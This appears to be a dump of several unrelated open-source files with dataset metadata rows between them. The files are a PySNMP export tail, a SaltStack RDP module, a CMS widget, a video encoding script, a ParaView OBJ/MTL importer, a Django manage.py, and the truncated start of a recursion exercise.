usdPPPoEProfileIndex=usdPPPoEProfileIndex, usdPPPoEObjects=usdPPPoEObjects, usdPPPoESummaryGroup=usdPPPoESummaryGroup, usdPPPoEIfStatsRxInsufficientResources=usdPPPoEIfStatsRxInsufficientResources, usdPPPoEGroups=usdPPPoEGroups, usdPPPoECompliance3=usdPPPoECompliance3, usdPPPoESubIfUrl=usdPPPoESubIfUrl, usdPPPoESummaryMajorIfAdminDown=usdPPPoESummaryMajorIfAdminDown, usdPPPoEIfTable=usdPPPoEIfTable, usdPPPoESummaryMajorIfOperDown=usdPPPoESummaryMajorIfOperDown, usdPPPoESummarySubIfAdminUp=usdPPPoESummarySubIfAdminUp, usdPPPoESubIfSessionId=usdPPPoESubIfSessionId, usdPPPoECompliance2=usdPPPoECompliance2, usdPPPoEIfStatsTxPADO=usdPPPoEIfStatsTxPADO, usdPPPoEProfileRowStatus=usdPPPoEProfileRowStatus, usdPPPoESubIfMotm=usdPPPoESubIfMotm, usdPPPoEIfEntry=usdPPPoEIfEntry, usdPPPoENextIfIndex=usdPPPoENextIfIndex, usdPPPoEIfAutoconfig=usdPPPoEIfAutoconfig, usdPPPoESummary=usdPPPoESummary, usdPPPoEMajorInterfaceCount=usdPPPoEMajorInterfaceCount, usdPPPoEIfStatsTxPADT=usdPPPoEIfStatsTxPADT, usdPPPoEIfMaxNumSessions=usdPPPoEIfMaxNumSessions, usdPPPoESummarySubIfOperUp=usdPPPoESummarySubIfOperUp, usdPPPoEGroup4=usdPPPoEGroup4, usdPPPoECompliance=usdPPPoECompliance, usdPPPoESummaryMajorIfAdminUp=usdPPPoESummaryMajorIfAdminUp, usdPPPoECompliance4=usdPPPoECompliance4, usdPPPoEIfStatsRxPADR=usdPPPoEIfStatsRxPADR, usdPPPoESummarySubInterfaceCount=usdPPPoESummarySubInterfaceCount, usdPPPoEIfStatsTxPADM=usdPPPoEIfStatsTxPADM, usdPPPoESubIfGroup2=usdPPPoESubIfGroup2, usdPPPoEConformance=usdPPPoEConformance, usdPPPoEIfStatsRxInvTags=usdPPPoEIfStatsRxInvTags, usdPPPoEGroup=usdPPPoEGroup, usdPPPoESummaryMajorIfNotPresent=usdPPPoESummaryMajorIfNotPresent, usdPPPoESubIfEntry=usdPPPoESubIfEntry, usdPPPoESummarySubIfOperDown=usdPPPoESummarySubIfOperDown, usdPPPoEIfLayer=usdPPPoEIfLayer, usdPPPoEIfRowStatus=usdPPPoEIfRowStatus, usdPPPoEProfileTable=usdPPPoEProfileTable, usdPPPoESubIfId=usdPPPoESubIfId, usdPPPoEIfStatsRxPADT=usdPPPoEIfStatsRxPADT)
| 148.923077 | 3,802 | 0.761639 |
acfa983e525f7016d11c0d5fcf9c7f718138a40d | 1,781 | py | Python | salt/modules/rdp.py | styro/salt | d087d94dca02ca8bf53a6c21b94944bc7957522c | [
"Apache-2.0"
] | 1 | 2015-05-20T16:55:50.000Z | 2015-05-20T16:55:50.000Z | salt/modules/rdp.py | styro/salt | d087d94dca02ca8bf53a6c21b94944bc7957522c | [
"Apache-2.0"
] | null | null | null | salt/modules/rdp.py | styro/salt | d087d94dca02ca8bf53a6c21b94944bc7957522c | [
"Apache-2.0"
] | 1 | 2021-12-02T15:30:00.000Z | 2021-12-02T15:30:00.000Z | # -*- coding: utf-8 -*-
'''
Manage RDP Service on Windows servers
'''
from __future__ import absolute_import
# Import python libs
import re
# Import salt libs
import salt.utils
def __virtual__():
'''
Only works on Windows systems
'''
if salt.utils.is_windows():
return 'rdp'
return False
def _parse_return_code_powershell(string):
'''
return from the input string the return code of the powershell command
'''
regex = re.search(r'ReturnValue\s*: (\d*)', string)
if not regex:
return False
else:
return int(regex.group(1))
def _psrdp(cmd):
'''
Create a Win32_TerminalServiceSetting WMI Object as $RDP and execute the
command cmd returns the STDOUT of the command
'''
rdp = ('$RDP = Get-WmiObject -Class Win32_TerminalServiceSetting '
'-Namespace root\\CIMV2\\TerminalServices -Computer . '
'-Authentication 6 -ErrorAction Stop')
return __salt__['cmd.run']('{0} ; {1}'.format(rdp, cmd),
shell='powershell')
def enable():
'''
Enable RDP the service on the server
CLI Example:
.. code-block:: bash
salt '*' rdp.enable
'''
return _parse_return_code_powershell(
_psrdp('$RDP.SetAllowTsConnections(1,1)')) == 0
def disable():
'''
Disable RDP the service on the server
CLI Example:
.. code-block:: bash
salt '*' rdp.disable
'''
return _parse_return_code_powershell(
_psrdp('$RDP.SetAllowTsConnections(0,1)')) == 0
def status():
'''
Show if rdp is enabled on the server
CLI Example:
.. code-block:: bash
salt '*' rdp.status
'''
out = int(_psrdp('echo $RDP.AllowTSConnections').strip())
return out != 0
| 19.788889 | 76 | 0.608647 |
acfa993e0fd83e7f715643765d92b8919b5eb5a8 | 409 | py | Python | canella/widget/widgets/card.py | mush42/Canella-CMS | b5132c271a3b8840f0b165c62d14de6853a3e5ac | [
"MIT"
] | 8 | 2017-01-30T22:46:40.000Z | 2018-03-30T21:35:28.000Z | canella/widget/widgets/card.py | mush42/Canella-CMS | b5132c271a3b8840f0b165c62d14de6853a3e5ac | [
"MIT"
] | null | null | null | canella/widget/widgets/card.py | mush42/Canella-CMS | b5132c271a3b8840f0b165c62d14de6853a3e5ac | [
"MIT"
] | 2 | 2018-01-16T10:31:27.000Z | 2020-10-01T19:49:10.000Z | from .. import Widget, WidgetWidth, WidgetLocation
class CardWidget(Widget):
template = 'canella/admin/widgets/card.html'
width = WidgetWidth.third
def __init__(self, color, icon, main_heading, sub_heading, details_link):
self.color = color
self.icon = icon
self.main_heading = main_heading
self.sub_heading = sub_heading
self.details_link = details_link
| 31.461538 | 77 | 0.696822 |
acfa997df58d76a961a816de2294bddb2e7b57ae | 7,402 | py | Python | Raws-Maji/Rifle is Beautiful [BD]/rifle_08.py | Ichunjo/encode-script | 389a9f497e637eaade6f99acee816636856961d4 | [
"MIT"
] | 36 | 2019-11-08T20:50:07.000Z | 2022-03-23T05:43:55.000Z | Raws-Maji/Rifle is Beautiful [BD]/rifle_08.py | Ichunjo/encode-script | 389a9f497e637eaade6f99acee816636856961d4 | [
"MIT"
] | 1 | 2019-11-08T21:26:16.000Z | 2019-11-08T21:26:16.000Z | Raws-Maji/Rifle is Beautiful [BD]/rifle_08.py | Ichunjo/encode-script | 389a9f497e637eaade6f99acee816636856961d4 | [
"MIT"
] | 7 | 2019-11-08T21:10:47.000Z | 2022-03-28T21:57:04.000Z | """Rifle is Beautiful script"""
__author__ = 'Vardë'
import os
import sys
import shlex
import subprocess
from pathlib import Path
from typing import NamedTuple
import debandshit as dbs
import vardefunc as vdf
import havsfunc as hvf
import G41Fun as gf
from vsutil import depth
import lvsfunc as lvf
import vapoursynth as vs
core = vs.core
class InfosBD(NamedTuple):
path: str
src: str
src_clip: vs.VideoNode
frame_start: int
frame_end: int
src_cut: vs.VideoNode
a_src: str
a_src_cut: str
a_enc_cut: str
name: str
output: str
chapter: str
output_final: str
def infos_bd(path, frame_start, frame_end) -> InfosBD:
src = path + '.m2ts'
src_clip = lvf.src(src, stream_index=0, ff_loglevel=4)
src_cut = src_clip[frame_start:frame_end] if (frame_start or frame_end) else src_clip
a_src = path + '_track_{}.wav'
a_src_cut = path + '_cut_track_{}.wav'
a_enc_cut = path + '_track_{}.m4a'
name = Path(sys.argv[0]).stem
output = name + '.265'
chapter = '_assets/chapters/' + name + '.txt'
output_final = name + '.mkv'
return InfosBD(path, src, src_clip, frame_start, frame_end,
src_cut, a_src, a_src_cut, a_enc_cut,
name, output, chapter, output_final)
JPBD = infos_bd(r'[BDMV][Rifle is Beautiful][Blu-Ray BOX BDx4+CDx2 Fin]\RIFLE_IS_BEAUTIFUL_BDBOX2_D3\BDMV\STREAM\00003', 0, -27)
JPBD_NCOP = infos_bd(r'[BDMV][Rifle is Beautiful][Blu-Ray BOX BDx4+CDx2 Fin]\RIFLE_IS_BEAUTIFUL_BDBOX1_D1\BDMV\STREAM\00006', 24, -24)
JPBD_NCED = infos_bd(r'[BDMV][Rifle is Beautiful][Blu-Ray BOX BDx4+CDx2 Fin]\RIFLE_IS_BEAUTIFUL_BDBOX1_D1\BDMV\STREAM\00007', 0, -24)
X265 = 'x265'
def do_filter():
"""Vapoursynth filtering"""
src = JPBD.src_cut
src = depth(src, 16)
out = src + src[-1]
opstart, opend = 2638, 4794
edstart, edend = 31767, 33924
dehalo = gf.MaskedDHA(out, rx=1.35, ry=1.35, darkstr=0.25, brightstr=1.0, maskpull=46, maskpush=148)
out = dehalo
antialias = lvf.sraa(out, 1.5, 9, downscaler=core.resize.Bicubic)
out = antialias
sharp = hvf.LSFmod(out, strength=75, Smode=3, Lmode=1, edgemode=1, edgemaskHQ=True)
out = sharp
deband_mask = lvf.denoise.detail_mask(out, brz_a=2000, brz_b=1000)
deband = dbs.f3kpf(out, 17, 24, 24)
deband = core.std.MaskedMerge(deband, out, deband_mask)
out = deband
src_c, ncop, nced = [clip.std.Median() for clip in [src, JPBD_NCOP.src_cut, JPBD_NCED.src_cut]]
opening_mask = vdf.dcm(out, src_c[opstart:opend+1], ncop[:opend-opstart+1], opstart, opend, 3, 3)
ending_mask = vdf.dcm(out, src_c[edstart:edend+1], nced[:edend-edstart+1], edstart, edend, 3, 3)
credit_mask = core.std.Expr([opening_mask, ending_mask], 'x y +').std.Convolution([1]*9)
credit = lvf.rfs(out, core.std.MaskedMerge(out, src, credit_mask), [(opstart, opend), (edstart, edend)])
out = credit
return depth(out, 10)
def sec_to_time(secs):
hours = secs / 3600
minutes = (secs % 3600) / 60
secs = secs % 60
return "%02d:%02d:%05.4f" % (hours, minutes, secs)
def do_encode(clip: vs.VideoNode)-> None:
"""Compression with x26X"""
if not os.path.isfile(JPBD.output):
print('\n\n\nVideo encoding')
bits = clip.format.bits_per_sample
x265_cmd = f'x265 -o {JPBD.output} - --y4m' + ' '
x265_cmd += f'--csv {JPBD.name}_log_x265.csv --csv-log-level 2' + ' '
x265_cmd += '--frame-threads 8 --pmode --pme --preset slower' + ' '
x265_cmd += f'--frames {clip.num_frames} --fps {clip.fps_num}/{clip.fps_den} --output-depth {bits}' + ' '
x265_cmd += '--rd 3 --no-rect --no-amp --rskip 1 --tu-intra-depth 2 --tu-inter-depth 2 --tskip' + ' '
x265_cmd += '--merange 48 --weightb' + ' '
x265_cmd += '--no-strong-intra-smoothing' + ' '
x265_cmd += '--psy-rd 2.0 --psy-rdoq 1.0 --no-open-gop --keyint 360 --min-keyint 12 --scenecut 45 --rc-lookahead 120 --bframes 16' + ' '
x265_cmd += '--crf 15 --aq-mode 3 --aq-strength 1.0 --qcomp 0.70' + ' '
x265_cmd += '--deblock=-1:-1 --no-sao --no-sao-non-deblock' + ' '
x265_cmd += f'--sar 1 --range limited --colorprim 1 --transfer 1 --colormatrix 1 --min-luma {str(16<<(bits - 8))} --max-luma {str(235<<(bits - 8))}'# + ' '
print("Encoder command: ", " ".join(shlex.split(x265_cmd)), "\n")
process = subprocess.Popen(shlex.split(x265_cmd), stdin=subprocess.PIPE)
clip.output(process.stdin, y4m=True, progress_update=lambda value, endvalue:
print(f"\rVapourSynth: {value}/{endvalue} ~ {100 * value // endvalue}% || Encoder: ", end=""))
process.communicate()
if not os.path.isfile(JPBD.a_src.format(1)):
print('\n\n\nAudio extraction')
eac3to_args = ['eac3to', JPBD.src,
'2:', JPBD.a_src.format(1),
# '3:', JPBD.a_src.format(2),
'-log=NUL']
subprocess.run(eac3to_args, text=True, check=True, encoding='utf-8')
if not os.path.isfile(JPBD.a_enc_cut.format(1)):
print('\n\n\nAudio encoding')
qaac_args = ['--no-delay', '--no-optimize', '--threading',
'--start', sec_to_time(JPBD.frame_start / (clip.fps_num/clip.fps_den)),
'--end', sec_to_time((JPBD.src_clip.num_frames + JPBD.frame_end) / (clip.fps_num/clip.fps_den))]
qaac_args_more = ['qaac', JPBD.a_src.format(1), '-V', '127', *qaac_args, '-o', JPBD.a_enc_cut.format(1)]
subprocess.run(qaac_args_more, text=True, check=True, encoding='utf-8')
# qaac_args_more = ['qaac', JPBD.a_src.format(2), '-V', '127', *qaac_args, '-o', JPBD.a_enc_cut.format(2)]
# subprocess.run(qaac_args_more, text=True, check=True, encoding='utf-8')
if not os.path.isfile('tags_aac_1.xml'):
ffprobe_args = ['ffprobe', '-loglevel', 'quiet', '-show_entries', 'format_tags=encoder', '-print_format', 'default=nokey=1:noprint_wrappers=1', JPBD.a_enc_cut.format(1)]
encoder_name = subprocess.check_output(ffprobe_args, shell=True, encoding='utf-8')
f = open("tags_aac.xml", 'w')
f.writelines(['<?xml version="1.0"?>', '<Tags>', '<Tag>', '<Targets>', '</Targets>',
'<Simple>', '<Name>ENCODER</Name>', f'<String>{encoder_name}</String>', '</Simple>',
'</Tag>', '</Tags>'])
f.close()
if not os.path.isfile(JPBD.output_final):
print('\nFinal muxing')
mkv_args = ['mkvmerge', '-o', JPBD.output_final,
'--track-name', '0:HEVC BDRip by Vardë@Raws-Maji', '--language', '0:jpn', JPBD.output,
'--tags', '0:tags_aac.xml', '--track-name', '0:AAC 2.0', '--language', '0:jpn', JPBD.a_enc_cut.format(1),
# '--tags', '0:tags_aac.xml', '--track-name', '0:AAC 2.0 Commentary', '--language', '0:jpn', JPBD.a_enc_cut.format(2),
'--chapter-language', 'jpn', '--chapters', JPBD.chapter]
subprocess.run(mkv_args, text=True, check=True, encoding='utf-8')
# Clean up
files = [JPBD.a_src.format(1), JPBD.a_src.format(2),
JPBD.a_enc_cut.format(1), JPBD.a_enc_cut.format(2), 'tags_aac.xml']
for file in files:
if os.path.exists(file):
os.remove(file)
if __name__ == '__main__':
FILTERED = do_filter()
do_encode(FILTERED)
| 40.228261 | 177 | 0.614564 |
acfa99ba02ade6e6a67ed3c170a3805697dcabe9 | 552 | py | Python | manage.py | titans55/pizza-ordering-service | 9e2fbf1347fa1cdf908362cfa1fd51ebb9557fee | [
"MIT"
] | 1 | 2019-11-13T12:09:33.000Z | 2019-11-13T12:09:33.000Z | manage.py | titans55/pizza-ordering-service | 9e2fbf1347fa1cdf908362cfa1fd51ebb9557fee | [
"MIT"
] | null | null | null | manage.py | titans55/pizza-ordering-service | 9e2fbf1347fa1cdf908362cfa1fd51ebb9557fee | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'PizzaOrderingService.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| 34.5 | 84 | 0.693841 |
acfa9adaea9c69b41b3a997e15132413de0a7e91 | 2,282 | py | Python | example/tutorial.py | PotasnikM/translator-to-suJSON | abb2001c78d431bd2087754666bc896ba0543dfd | [
"MIT"
] | 2 | 2019-07-01T12:45:25.000Z | 2020-06-23T11:48:08.000Z | example/tutorial.py | PotasnikM/translator-to-suJSON | abb2001c78d431bd2087754666bc896ba0543dfd | [
"MIT"
] | 17 | 2019-04-25T10:46:40.000Z | 2020-11-10T09:28:55.000Z | example/tutorial.py | PotasnikM/translator-to-suJSON | abb2001c78d431bd2087754666bc896ba0543dfd | [
"MIT"
] | 3 | 2019-06-22T19:51:08.000Z | 2021-02-08T09:17:55.000Z | from sujson._sujson import Sujson
import subprocess
from subprocess import PIPE
from pathlib import Path
sujson = Sujson()
sujson_file = str(Path('example', 'hdtv5.json'))
sujson._read_sujson(sujson_file)
df = sujson.pandas_export()
print(df)
# mean
print(df.groupby('stimulus_id')['score'].mean())
# standard deviation
print(df.groupby('stimulus_id')['score'].std())
# translating .xls file to suJSON
xls_file = str(Path('example', 'data', 'VQEG_HDTV_Final_Report_Data.xls'))
config = str(Path('example', 'config', 'config_for_hdtv.json'))
sujson_from_xls = str(Path('example', 'xls_output.json'))
command = 'python -m sujson ingest {} {} -o {}'.format(xls_file, config, sujson_from_xls)
proc = subprocess.Popen(command, stdin=PIPE, stderr=PIPE, text=True)
proc.communicate()
# translating .xls file to suJSON without output file - printing to console
command = 'python -m sujson ingest {} {}'.format(xls_file, config)
proc = subprocess.Popen(command, stdin=PIPE, stderr=PIPE, text=True)
proc.communicate()
# translating .csv file to suJSON
csv_file = str(Path('example', 'data', 'subjective_quality_datasets.csv'))
config = str(Path('example', 'config', 'config_for_hdtv_csv.json'))
sujson_from_csv = str(Path('example', 'csv_output.json'))
command = 'python -m sujson ingest {} {} -o {}'.format(csv_file, config, sujson_from_csv)
proc = subprocess.Popen(command, stdin=PIPE, stderr=PIPE, text=True)
proc.communicate()
# translating .csv file to suJSON without output file - printing to console
command = 'python -m sujson ingest {} {}'.format(csv_file, config)
proc = subprocess.Popen(command, stdin=PIPE, stderr=PIPE, text=True)
proc.communicate()
# suJSON to pandas dataframe (.csv)
output_csv = str(Path('example', 'output_pandas.csv'))
export_format = 'Pandas'
command = 'python -m sujson export {} -o {} -f {}'.format(sujson_from_csv, output_csv, export_format)
proc = subprocess.Popen(command, stdin=PIPE, stderr=PIPE, text=True)
proc.communicate()
# suJSON to .pickle file
output_pickle = str(Path('example', 'output_pickle.pickle'))
export_format = 'suJSON'
command = 'python -m sujson export {} -o {} -f {}'.format(sujson_from_csv, output_pickle, export_format)
proc = subprocess.Popen(command, stdin=PIPE, stderr=PIPE, text=True)
proc.communicate()
| 34.575758 | 104 | 0.737949 |
acfa9b4e71de5cf393efebbc92f57312f71782e7 | 13,911 | py | Python | Utilities/ParaView/obj-mtl-importer.py | jmargeta/vtk-js | 78bb2f1729a4104df7ff6a80a19fe18579db9119 | [
"BSD-3-Clause"
] | null | null | null | Utilities/ParaView/obj-mtl-importer.py | jmargeta/vtk-js | 78bb2f1729a4104df7ff6a80a19fe18579db9119 | [
"BSD-3-Clause"
] | 1 | 2022-03-02T05:53:14.000Z | 2022-03-02T05:53:14.000Z | Utilities/ParaView/obj-mtl-importer.py | jmargeta/vtk-js | 78bb2f1729a4104df7ff6a80a19fe18579db9119 | [
"BSD-3-Clause"
] | 1 | 2020-06-19T08:21:54.000Z | 2020-06-19T08:21:54.000Z | #!/Applications/ParaView-5.4.0.app/Contents/bin/pvpython
# -----------------------------------------------------------------------------
# User configuration
# -----------------------------------------------------------------------------
# objToLoad = '/Users/seb/Documents/code/Web/vtk-js/Data/obj/ferrari-f1-race-car/ferrari-f1-race-car.obj'
# mtlToLoad = '/Users/seb/Documents/code/Web/vtk-js/Data/obj/ferrari-f1-race-car/ferrari-f1-race-car.mtl'
# objToLoad = '/Users/seb/Documents/code/Web/vtk-js/Data/obj/blskes-plane/blskes-plane.obj'
# mtlToLoad = '/Users/seb/Documents/code/Web/vtk-js/Data/obj/blskes-plane/blskes-plane.mtl'
# objToLoad = '/Users/seb/Documents/code/Web/vtk-js/Data/obj/mini-cooper/mini-cooper.obj'
# mtlToLoad = '/Users/seb/Documents/code/Web/vtk-js/Data/obj/mini-cooper/mini-cooper.mtl'
# objToLoad = '/Users/seb/Documents/code/Web/vtk-js/Data/obj/space-shuttle-orbiter/space-shuttle-orbiter.obj'
# mtlToLoad = '/Users/seb/Documents/code/Web/vtk-js/Data/obj/space-shuttle-orbiter/space-shuttle-orbiter.mtl'
# -----------------------------------------------------------------------------
from vtk import *
from paraview import simple
import os
import sys
import hashlib
import json
# -----------------------------------------------------------------------------
# obj Parser
# -----------------------------------------------------------------------------
class OBJParser(object):
def __init__(self, objFilePath, splitMode = None):
self.splitOn = splitMode
self.pieces = [];
self.v = [];
self.vt = [];
self.vn = [];
self.f = [[]];
self.size = 0;
self.output = []
with open(objFilePath, "r") as objLines:
for line in objLines:
self.parseLine(line.rstrip('\n'))
self.end();
@staticmethod
def createPoints(pythonArray):
pts = vtkPoints()
nbPoints = len(pythonArray) / 3
pts.SetNumberOfPoints(nbPoints);
for i in range(nbPoints):
pts.SetPoint(i, pythonArray[(i * 3) + 0], pythonArray[(i * 3) + 1], pythonArray[(i * 3) + 2])
return pts
@staticmethod
def createCellArray(pythonArray, nbCells):
cellArray = vtkCellArray()
cellArray.SetNumberOfCells(nbCells)
idArray = cellArray.GetData()
idArray.SetNumberOfTuples(len(pythonArray))
for i in range(len(pythonArray)):
idArray.SetValue(i, pythonArray[i])
return cellArray
@staticmethod
def createFloatArray(name, nbComponents, pythonArray):
array = vtkFloatArray()
array.SetName(name)
array.SetNumberOfComponents(nbComponents)
array.SetNumberOfTuples(len(pythonArray) / nbComponents)
for i in range(len(pythonArray)):
array.SetValue(i, pythonArray[i])
return array
@staticmethod
def pushVector(src, srcOffset, dst, vectorSize):
for i in range(vectorSize):
dst.append(src[srcOffset + i])
@staticmethod
def faceMap(str):
idxs = [int(i) if len(i) else 1 for i in str.split('/')]
vertexIdx = int(idxs[0] - 1);
textCoordIdx = int(idxs[1] - 1) if len(idxs) > 1 else vertexIdx
vertexNormal = int(idxs[2] - 1) if len(idxs) > 2 else vertexIdx
return [vertexIdx, textCoordIdx, vertexNormal]
def parseLine(self, line):
if len(line.strip()) == 0 or line[0] == '#':
return
tokens = line.strip().split()
if tokens[0] == self.splitOn:
tokens.pop(0)
self.pieces.append(' '.join(tokens).strip())
self.f.append([])
self.size += 1;
elif tokens[0] == 'v':
self.v.append(float(tokens[1]))
self.v.append(float(tokens[2]))
self.v.append(float(tokens[3]))
elif tokens[0] == 'vt':
self.vt.append(float(tokens[1]))
self.vt.append(float(tokens[2]))
elif tokens[0] == 'vn':
self.vn.append(float(tokens[1]))
self.vn.append(float(tokens[2]))
self.vn.append(float(tokens[3]))
elif tokens[0] == 'f':
# Handle triangles for now
if self.size == 0:
self.size += 1
cells = self.f[self.size - 1];
tokens.pop(0)
size = len(tokens)
cells.append(size)
for i in range(size):
cells.append(OBJParser.faceMap(tokens[i]))
def end(self):
hasTcoords = True if len(self.vt) > 0 else False
hasNormals = True if len(self.vn) > 0 else False
if self.splitOn:
for idx in range(self.size):
ctMapping = {}
polydata = vtkPolyData()
pts = []
tc = []
normals = []
polys = []
nbCells = 0
polyIn = self.f[idx]
nbElems = len(polyIn)
offset = 0
while offset < nbElems:
cellSize = polyIn[offset]
nbCells += 1
polys.append(cellSize)
for pIdx in range(cellSize):
vIdx, tcIdx, nIdx = polyIn[offset + pIdx + 1]
key = '%d/%d/%d' % (vIdx, tcIdx, nIdx)
if key not in ctMapping:
ctMapping[key] = len(pts) / 3
OBJParser.pushVector(self.v, vIdx * 3, pts, 3)
if hasTcoords:
OBJParser.pushVector(self.vt, tcIdx * 2, tc, 2)
if hasNormals:
OBJParser.pushVector(self.vn, nIdx * 3, normals, 3)
polys.append(ctMapping[key])
offset += cellSize + 1;
polydata.SetPoints(OBJParser.createPoints(pts))
polydata.SetPolys(OBJParser.createCellArray(polys, nbCells))
if hasTcoords:
tcoords = OBJParser.createFloatArray('TextureCoordinates', 2, tc)
polydata.GetPointData().SetTCoords(tcoords);
if hasNormals:
normalsArray = OBJParser.createFloatArray('Normals', 3, normals)
polydata.GetPointData().SetNormals(normalsArray)
# register in output
self.output.append(polydata)
print(self.pieces[idx])
else:
polydata = vtkPolyData()
polydata.SetPoints(OBJParser.createPoints(self.v))
if hasTcoords and (len(self.v) / 3) == (len(self.vt) / 2):
tcoords = OBJParser.createFloatArray('TextureCoordinates', 2, self.vt)
polydata.GetPointData().SetTCoords(tcoords);
if hasNormals and (len(self.v) == len(self.vn)):
normalsArray = OBJParser.createFloatArray('Normals', 3, self.vn)
polydata.GetPointData().SetNormals(normalsArray)
polys = []
polyIn = self.f[0]
nbElems = len(polyIn)
offset = 0
nbCells = 0
while offset < nbElems:
cellSize = polyIn[offset]
nbCells += 1
polys.append(cellSize)
for pIdx in range(cellSize):
polys.append(polyIn[offset + pIdx + 1][0])
offset += cellSize + 1
polydata.SetPolys(OBJParser.createCellArray(polys, nbCells))
self.output.append(polydata)
# -----------------------------------------------------------------------------
# mtl Parser
# -----------------------------------------------------------------------------
def materialToSHA(mat):
keys = mat.keys()
keys.sort()
m = hashlib.md5()
for key in keys:
m.update(key)
for token in mat[key]:
m.update(token)
return m.hexdigest()
class MTLParser(object):
def __init__(self, mtlFilePath):
self.materials = {}
self.currentMaterial = None
self.textures = {}
self.baseDir = os.path.dirname(mtlFilePath)
self.reducedMaterialMap = {}
self.reverseReduceMap = {}
self.representationsParameters = {}
with open(mtlFilePath, "r") as lines:
for line in lines:
self.parseLine(line.rstrip('\n'))
def parseLine(self, line):
if len(line.strip()) == 0 or line[0] == '#':
return
tokens = line.strip().split()
if tokens[0] == 'newmtl':
tokens.pop(0);
self.currentMaterial = ' '.join(tokens).strip()
elif self.currentMaterial:
if self.currentMaterial not in self.materials:
self.materials[self.currentMaterial] = {}
if len(tokens) > 1:
self.materials[self.currentMaterial][tokens[0]] = tokens[1:]
def reduceMaterialDefinitions(self):
for name in self.materials:
sha = materialToSHA(self.materials[name])
self.reducedMaterialMap[name] = sha
self.reverseReduceMap[sha] = name
print('Reducing materials from %s to %s' % (len(self.reducedMaterialMap), len(self.reverseReduceMap)))
def applyMaterialToRepresentation(self, name, representation):
self.representationsParameters[name] = {}
material = {}
if name in self.materials:
material = self.materials[name]
if name in self.reverseReduceMap:
material = self.materials[self.reverseReduceMap[name]]
if 'map_Kd' in material:
if name not in self.textures:
from paraview import servermanager
texture = servermanager._getPyProxy(servermanager.CreateProxy('textures', 'ImageTexture'))
texture.FileName = os.path.join(self.baseDir, material['map_Kd'][0])
self.textures[name] = texture
servermanager.Register(texture)
representation.Texture = self.textures[name]
if 'Ka' in material:
representation.AmbientColor = [float(n) for n in material['Ka']]
self.representationsParameters[name]['AmbientColor'] = [float(n) for n in material['Ka']]
if 'Ks' in material:
representation.SpecularColor = [float(v) for v in material['Ks']]
self.representationsParameters[name]['SpecularColor'] = [float(v) for v in material['Ks']]
if 'Kd' in material:
representation.DiffuseColor = [float(v) for v in material['Kd']]
self.representationsParameters[name]['DiffuseColor'] = [float(v) for v in material['Kd']]
if 'd' in material:
representation.Opacity = float(material['d'][0])
self.representationsParameters[name]['Opacity'] = float(material['d'][0])
if 'Ns' in material:
representation.SpecularPower = float(material['Ns'][0])
self.representationsParameters[name]['SpecularPower'] = float(material['Ns'][0])
if 'illum' in material:
representation.Ambient = 1.0 if 0 <= float(material['illum'][0]) else 0.0
representation.Diffuse = 1.0 if 1 <= float(material['illum'][0]) else 0.0
representation.Specular = 1.0 if 2 <= float(material['illum'][0]) else 0.0
self.representationsParameters[name]['Ambient'] = 1.0 if 0 <= float(material['illum'][0]) else 0.0
self.representationsParameters[name]['Diffuse'] = 1.0 if 1 <= float(material['illum'][0]) else 0.0
self.representationsParameters[name]['Specular'] = 1.0 if 2 <= float(material['illum'][0]) else 0.0
# else:
# representation.Ambient = 1.0
# representation.Diffuse = 1.0
# representation.Specular = 1.0
# -----------------------------------------------------------------------------
# Mesh writer builder
# -----------------------------------------------------------------------------
def writeMeshes(meshBaseDirectory, objReader, nameMapping = {}):
nameToFilePath = {}
writer = vtkXMLPolyDataWriter()
ext = '.vtp'
if not os.path.exists(meshBaseDirectory):
os.makedirs(meshBaseDirectory)
nbPieces = len(objReader.pieces)
dsList = {}
nameToKey = nameMapping
for idx in range(nbPieces):
name = objReader.pieces[idx]
if name not in nameToKey:
nameToKey[name] = name
# Gather polydata with same textures
for idx in range(nbPieces):
name = objReader.pieces[idx]
key = nameToKey[name]
if key not in dsList:
dsList[key] = []
dsList[key].append(objReader.output[idx])
# Write each dataset
idx = 0
size = len(dsList)
for name in dsList:
fullPath = os.path.join(meshBaseDirectory, '%s%s' % (name, ext))
merge = vtkAppendPolyData()
for block in dsList[name]:
merge.AddInputData(block)
merge.Update()
writer.SetInputData(merge.GetOutput(0))
writer.SetFileName(fullPath)
writer.Modified()
print('%d - %d/%d - %s => %s' % ((idx + 1), len(dsList[name]), size, name, fullPath))
writer.Write()
nameToFilePath[name] = fullPath
idx += 1
return nameToFilePath;
# -----------------------------------------------------------------------------
# Scene Loader
# -----------------------------------------------------------------------------
def loadScene(objFilePath, mtlFilePath):
mtlReader = MTLParser(mtlFilePath)
mtlReader.reduceMaterialDefinitions()
objReader = OBJParser(objFilePath, 'usemtl')
meshBaseDirectory = os.path.join(os.path.dirname(objFilePath), os.path.basename(objFilePath)[:-4])
meshMapping = writeMeshes(meshBaseDirectory, objReader, mtlReader.reducedMaterialMap)
for name in meshMapping:
source = simple.OpenDataFile(meshMapping[name], guiName=name)
rep = simple.Show(source)
mtlReader.applyMaterialToRepresentation(name, rep)
with open('%s/representations.json' % meshBaseDirectory, "w") as text_file:
text_file.write(json.dumps(mtlReader.representationsParameters, indent=2, sort_keys=True))
simple.Render()
# -----------------------------------------------------------------------------
# Main
# -----------------------------------------------------------------------------
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: obj-mtl-importer /path/to/file.obj")
else:
objPath = sys.argv[1]
loadScene(objPath, '%s.mtl' % objPath[:-4])
simple.SaveState('%s-pv-state.pvsm' % objPath[:-4])
| 34.7775 | 109 | 0.568543 |
acfa9c16078ed808faddfad76bc1c8818e52a11c | 1,150 | py | Python | src/recursions/010_recursion_braces.py | Ataago/Data-Structures-Algorithms | f85a5e4099a0b2c6a93a9bdcdd0245540fd41457 | [
"MIT"
] | null | null | null | src/recursions/010_recursion_braces.py | Ataago/Data-Structures-Algorithms | f85a5e4099a0b2c6a93a9bdcdd0245540fd41457 | [
"MIT"
] | null | null | null | src/recursions/010_recursion_braces.py | Ataago/Data-Structures-Algorithms | f85a5e4099a0b2c6a93a9bdcdd0245540fd41457 | [
"MIT"
] | 1 | 2021-06-07T12:49:14.000Z | 2021-06-07T12:49:14.000Z | # !/usr/bin/env python3
# encoding: utf-8
"""
Find all the well-formed combinations of N {}.
@author: Mohammed Ataaur Rahaman
"""
